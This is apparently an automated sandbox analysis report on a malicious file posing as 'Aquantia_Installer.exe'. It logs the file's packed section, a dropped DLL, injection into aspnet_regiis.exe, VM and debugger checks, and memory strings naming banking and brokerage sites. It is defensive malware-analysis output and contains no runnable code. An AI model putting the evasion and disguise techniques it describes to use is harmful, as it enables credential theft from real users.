              Source: C:\Users\user\Desktop\Aquantia_Installer.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: Aquantia_Installer.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: Aquantia_Installer.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: mscorlib.pdb ty source: Aquantia_Installer.exe, 00000000.00000002.2351578827.000000000181B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Desktop\Aquantia_Installer.PDB source: Aquantia_Installer.exe, 00000000.00000002.2351199241.00000000014F9000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: Aquantia_Installer.exe, 00000000.00000002.2351578827.00000000017CA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: mscorlib.pdb source: WER1023.tmp.dmp.6.dr
              Source: Binary string: \??\C:\Windows\mscorlib.pdbo source: Aquantia_Installer.exe, 00000000.00000002.2351578827.00000000017CA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb6 source: Aquantia_Installer.exe, 00000000.00000002.2351578827.00000000017CA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: mscorlib.ni.pdb source: WER1023.tmp.dmp.6.dr
              Source: Binary string: n0C:\Windows\mscorlib.pdb source: Aquantia_Installer.exe, 00000000.00000002.2351199241.00000000014F9000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\mscorlib.pdb source: Aquantia_Installer.exe, 00000000.00000002.2351578827.00000000017CA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: mscorlib.pdbD`aq source: WER1023.tmp.dmp.6.dr
              Source: Binary string: mscorlib.ni.pdbRSDS source: WER1023.tmp.dmp.6.dr

              Data Obfuscation

              barindex
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeUnpacked PE file: 0.2.Aquantia_Installer.exe.fe0000.0.unpack 4mh:*:EW;.text:ER;.rsrc:R;.reloc:R;Unknown_Section4:ER; vs Unknown_Section0:EW;Unknown_Section1:ER;Unknown_Section2:R;Unknown_Section3:R;Unknown_Section4:ER;
              Source: Aquantia_Installer.exeStatic PE information: section name: 4mh:*
              Source: Aquantia_Installer.exeStatic PE information: section name:
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeCode function: 0_2_00FE26FE push ecx; retf 0_2_00FE277A
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeCode function: 0_2_00FE4824 push esp; iretd 0_2_00FE4847
              Source: Aquantia_Installer.exeStatic PE information: section name: 4mh:* entropy: 7.99971930966257
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeFile created: C:\Users\user\AppData\Roaming\gdi32.dllJump to dropped file
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: Yara matchFile source: Process Memory Space: Aquantia_Installer.exe PID: 3716, type: MEMORYSTR
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeMemory allocated: 16C0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeMemory allocated: 3410000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeMemory allocated: 3240000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeMemory allocated: 59E0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeMemory allocated: 69E0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeMemory allocated: 6B10000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeMemory allocated: 7B10000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeMemory allocated: 7FE0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeMemory allocated: 8FE0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeMemory allocated: 9FE0000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe TID: 6392Thread sleep time: -180000s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe TID: 2228Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeCode function: 0_2_6CF32983 FindFirstFileExW,0_2_6CF32983
              Source: Amcache.hve.6.drBinary or memory string: VMware
              Source: aspnet_regiis.exe, 00000003.00000003.2089590069.000000000571B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
              Source: aspnet_regiis.exe, 00000003.00000003.2089590069.000000000571B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
              Source: aspnet_regiis.exe, 00000003.00000003.2089365707.0000000005728000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696428655p
              Source: aspnet_regiis.exe, 00000003.00000003.2089590069.000000000571B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
              Source: Amcache.hve.6.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
              Source: aspnet_regiis.exe, 00000003.00000003.2222804012.000000000309C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2225798680.00000000030DC000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2225798680.000000000309C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2222804012.00000000030DC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: aspnet_regiis.exe, 00000003.00000003.2089590069.000000000571B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
              Source: Amcache.hve.6.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
              Source: aspnet_regiis.exe, 00000003.00000003.2089590069.000000000571B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
              Source: Amcache.hve.6.drBinary or memory string: vmci.sys
              Source: aspnet_regiis.exe, 00000003.00000003.2089590069.000000000571B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
              Source: aspnet_regiis.exe, 00000003.00000003.2089590069.000000000571B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
              Source: aspnet_regiis.exe, 00000003.00000003.2089590069.000000000571B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
              Source: aspnet_regiis.exe, 00000003.00000003.2089590069.000000000571B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
              Source: aspnet_regiis.exe, 00000003.00000003.2089590069.000000000571B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
              Source: aspnet_regiis.exe, 00000003.00000003.2089365707.0000000005728000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: YNVMware
              Source: Amcache.hve.6.drBinary or memory string: VMware20,1
              Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Generation Counter
              Source: Amcache.hve.6.drBinary or memory string: NECVMWar VMware SATA CD00
              Source: Amcache.hve.6.drBinary or memory string: VMware Virtual disk SCSI Disk Device
              Source: aspnet_regiis.exe, 00000003.00000003.2089590069.000000000571B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
              Source: Amcache.hve.6.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
              Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
              Source: Amcache.hve.6.drBinary or memory string: VMware PCI VMCI Bus Device
              Source: Amcache.hve.6.drBinary or memory string: VMware VMCI Bus Device
              Source: Amcache.hve.6.drBinary or memory string: VMware Virtual RAM
              Source: Amcache.hve.6.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
              Source: aspnet_regiis.exe, 00000003.00000003.2089590069.000000000571B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
              Source: aspnet_regiis.exe, 00000003.00000003.2089590069.000000000571B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
              Source: Amcache.hve.6.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
              Source: aspnet_regiis.exe, 00000003.00000002.2225798680.00000000030DC000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2222804012.00000000030DC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW6
              Source: aspnet_regiis.exe, 00000003.00000003.2089590069.000000000571B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
              Source: Amcache.hve.6.drBinary or memory string: VMware Virtual USB Mouse
              Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin
              Source: Amcache.hve.6.drBinary or memory string: VMware, Inc.
              Source: aspnet_regiis.exe, 00000003.00000003.2089590069.000000000571B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
              Source: Amcache.hve.6.drBinary or memory string: VMware20,1hbin@
              Source: Amcache.hve.6.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
              Source: Amcache.hve.6.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
              Source: aspnet_regiis.exe, 00000003.00000003.2089590069.000000000571B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
              Source: Amcache.hve.6.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
              Source: aspnet_regiis.exe, 00000003.00000003.2089590069.000000000571B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
              Source: aspnet_regiis.exe, 00000003.00000003.2089590069.000000000571B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
              Source: aspnet_regiis.exe, 00000003.00000003.2089590069.000000000571B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
              Source: aspnet_regiis.exe, 00000003.00000003.2089590069.000000000571B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
              Source: Amcache.hve.6.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
              Source: aspnet_regiis.exe, 00000003.00000003.2089590069.000000000571B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
              Source: aspnet_regiis.exe, 00000003.00000003.2089590069.000000000571B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
              Source: aspnet_regiis.exe, 00000003.00000003.2089590069.000000000571B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
              Source: Amcache.hve.6.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
              Source: aspnet_regiis.exe, 00000003.00000003.2089590069.000000000571B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
              Source: aspnet_regiis.exe, 00000003.00000003.2089590069.000000000571B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
              Source: aspnet_regiis.exe, 00000003.00000003.2089590069.000000000571B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
              Source: aspnet_regiis.exe, 00000003.00000003.2089590069.000000000571B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
              Source: Amcache.hve.6.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
              Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin`
              Source: aspnet_regiis.exe, 00000003.00000003.2089590069.000000000571B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
              Source: Amcache.hve.6.drBinary or memory string: \driver\vmci,\driver\pci
              Source: aspnet_regiis.exe, 00000003.00000003.2089590069.000000000571B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
              Source: Amcache.hve.6.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
              Source: aspnet_regiis.exe, 00000003.00000003.2089590069.000000000571B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
              Source: Amcache.hve.6.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
              Source: aspnet_regiis.exe, 00000003.00000003.2089590069.000000000571B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02F8E5B0 LdrInitializeThunk,3_2_02F8E5B0
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeCode function: 0_2_6CF2F93A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6CF2F93A
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeCode function: 0_2_6CF310C5 mov eax, dword ptr fs:[00000030h]0_2_6CF310C5
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeCode function: 0_2_6CF3229A mov eax, dword ptr fs:[00000030h]0_2_6CF3229A
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeCode function: 0_2_6CF33EAD GetProcessHeap,0_2_6CF33EAD
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeCode function: 0_2_6CF2F461 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6CF2F461
